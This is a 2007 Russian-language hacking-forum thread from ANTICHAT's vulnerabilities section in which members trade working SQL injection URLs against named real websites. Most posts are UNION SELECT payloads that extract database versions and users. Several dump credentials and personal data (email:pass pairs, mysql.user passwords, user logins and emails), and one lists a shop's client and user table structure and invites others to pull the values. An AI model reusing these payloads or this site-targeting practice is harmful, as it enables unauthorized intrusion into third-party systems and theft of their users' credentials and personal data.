HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 05.04.2007, 14:55
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами: 10483586

Репутация: 5826


По умолчанию

Код:
http://www.mp3prikol.ru/?action=view_track&track_id=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5,6,7/*
Код:
http://www.rightsite.ru/cgi-bin/list.pl?mode=show_yellow&kod_tovar=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,convert(concat(database(),char(58),user(),char(58),version()),char),13,14,15,16,17,18,19,20,21/*
Код:
http://www.vladimirka.ru/kulinar/?razdel=45&type=tovar&id=-1+union+select+1,222,3,4,555/*
 
Ответить с цитированием

  #2  
Старый 05.04.2007, 15:11
p-range
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
С нами: 10663526

Репутация: 715
По умолчанию

rabota.disell.ru
Цитата:
rabota.disell.ru/print.php?ID=-1+union+select+1,concat(email,0x3a,pass),3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19+from+users+limi t+0,1/*
rabota.disell.ru/print.php?ID=-1+union+select+1,concat(email,0x3a,pass),3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19+from+users+limi t+1,1/*
=\
Интеллектуальная поисковая система Disell.ru
Цитата:
http://top100.disell.ru/top.php?cat=-1+union+select+1,version(),user()/*
таблицы не подобрал \=
 
Ответить с цитированием

  #3  
Старый 05.04.2007, 18:46
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
С нами: 10686686

Репутация: 447
По умолчанию

Цитата:
Сообщение от p-range  
Код:
http://top100.disell.ru/top.php?cat=-1+union+select+1,version(),user()/*
таблицы не подобрал \=
не поверю чтоб ты не заметил версию
Код:
http://top100.disell.ru/top.php?cat=-1+union+select+1,null,concat(id,char(58),password,char(58),mail)+FROM+top_users/*
 
Ответить с цитированием

  #4  
Старый 05.04.2007, 15:17
Fr-Ron
Участник форума
Регистрация: 10.09.2006
Сообщений: 185
С нами: 10350730

Репутация: 337
По умолчанию

Начал осваивать MsSQL.
Магазичик всякой фигни =\
Вывод версии базы :

Цитата:
http://www.odarim.ru/sad/item.asp?idItem=7457+or+7457=@@version--
**********

Tables : dtproperties, hits, cards, cards_dbtree, class_goods, class_goods2, class_pub, clients, D99_Tmp, DBTree, DBTreeHead, flowers, flowers_dbtree, fooo, forum, hits_eng, images, items_authors, items_authors_dbtree, items_authors_items_authors, items_goods, items_goods_dbtree, items_goods_items_pubs, items_menu, items_menu2,items_news, items_pubs, listcena, main_shtuchki, new_shtuchki, news_shtuchki, old_clients, old_orders, orders, sysconstraints, syssegments, t_jiaozhu, TecParam, timetable, timeuser, Users, valuta

**********

Table : forum
Columns : id_post, id_list, key_publik, name,gender, age, prof, message, title_answer, answer

**********

Table : clients
Columns : id_clients, date_create, fio, phones, mail, dostavka, adress, metro, package, comment, date_dostavka, place, discount, adv, ref, hide

**********

Table : Users
Columns : idUser, Nick, Password

Сами значения выводить не пробовал, все в ваших руках! =)

Последний раз редактировалось Fr-Ron; 05.04.2007 в 15:33..
 
Ответить с цитированием

  #5  
Старый 05.04.2007, 15:46
p-range
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
С нами: 10663526

Репутация: 715
По умолчанию

ОАО "НГК "Славнефть"
=-OOO
Цитата:
http://www.slavneft.ru/press/print.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9/*
Цитата:
http://www.santechmart.ru/print.php?id=-1+union+select+version()/*
 
Ответить с цитированием

  #6  
Старый 05.04.2007, 16:17
p-range
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
С нами: 10663526

Репутация: 715
По умолчанию

KBE - Оконные системы
Цитата:
http://www.kbe.ua/includes/print.php?id=-1+union+select+1,2,3,4,5,6,7,8+from+users+limit+0, 1/*
таблица есть, названия колонок не подобрал... \=



kurskcity.ru
Цитата:
http://www.kurskcity.ru/print.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*
Цитата:
http://vid.org.ua/print.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*
 
Ответить с цитированием

  #7  
Старый 05.04.2007, 17:16
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами: 10483586

Репутация: 5826


По умолчанию

Код:
http://mosgs.ru/?module=card&view=full&id=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7,8,9,10,11,12/*
http://mosgs.ru/?module=card&view=full&id=-1+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12+from+information_schema.tables+limit+19,1/*
http://mosgs.ru/?module=card&view=full&id=-1+union+select+1,2,3,concat(table_schema,char(58),column_name),5,6,7,8,9,10,11,12+from+information_schema.columns+where+table_name=char(77,65,73,76)+limit+0,1/*
http://mosgs.ru/?module=card&view=full&id=-1+union+select+1,2,3,concat(ID,char(58),EMAIL,char(58),ORGANIZATION_REF),5,6,7,8,9,10,11,12+from+db4797a.MAIL+limit+0,1/*
Код:
http://www.earngame.com/index.php?func=fileinfo&id=-1+union+select+1,2,3,4,5,6,7,8,9,concat(database(),char(58),user(),char(58),version()),11/*
 
Ответить с цитированием

  #8  
Старый 05.04.2007, 19:49
_GaLs_
Постоянный
Регистрация: 21.04.2006
Сообщений: 540
С нами: 10555586

Репутация: 726


По умолчанию

http://gostudy.com.ua

Код:
http://gostudy.com.ua/news.phtml?id=-40+union+select+1,concat(user(),0x3a,version()),3,4,5,6,7,8,9/*
 
Ответить с цитированием

  #9  
Старый 05.04.2007, 20:17
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
С нами: 10145068

Репутация: 453
По умолчанию

Цитата:
http://www.calit2.net/newsroom/article.php?id='%20union%20select%201,concat(user, char(58),password),3,4,5,6,7,8,9%20from%20mysql.us er/*
Цитата:
http://www.dailycal.org/printable.php?id=-15734%20UNION%20SELECT%200,1,2,3,4,AES_DECRYPT(AES _ENCRYPT(concat(user,char(58),password),0),0),6,7, 8,9,10,11,12,13,14,15,16%20from%20mysql.user/*
____

Последний раз редактировалось kamaz; 05.04.2007 в 20:21..
 
Ответить с цитированием

  #10  
Старый 05.04.2007, 20:34
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами: 10483586

Репутация: 5826


По умолчанию

Код:
http://lib.chistopol.ru/?lib=dictionary&d=23&id=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version())/*
http://lib.chistopol.ru/?lib=dictionary&d=23&id=-1+union+select+1,2,table_name+from+information_schema.tables+limit+46,1/*
http://lib.chistopol.ru/?lib=dictionary&d=23&id=-1+union+select+1,2,concat(table_schema,char(58),column_name)+from+information_schema.columns+where+table_name=char(109,97,105,110,95,117,115,101,114)+limit+0,1/*
http://lib.chistopol.ru/?lib=dictionary&d=23&id=-1+union+select+1,2,concat(id,char(58),user_login,char(58),user_pass,char(58),user_name,char(58),user_mail,char(58),user_url,char(58),user_icq,char(58),user_maillist,char(58),user_uroven)+from+svgroup_avenbibl.main_user+limit+0,1/*

Последний раз редактировалось Grey; 05.04.2007 в 20:39..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.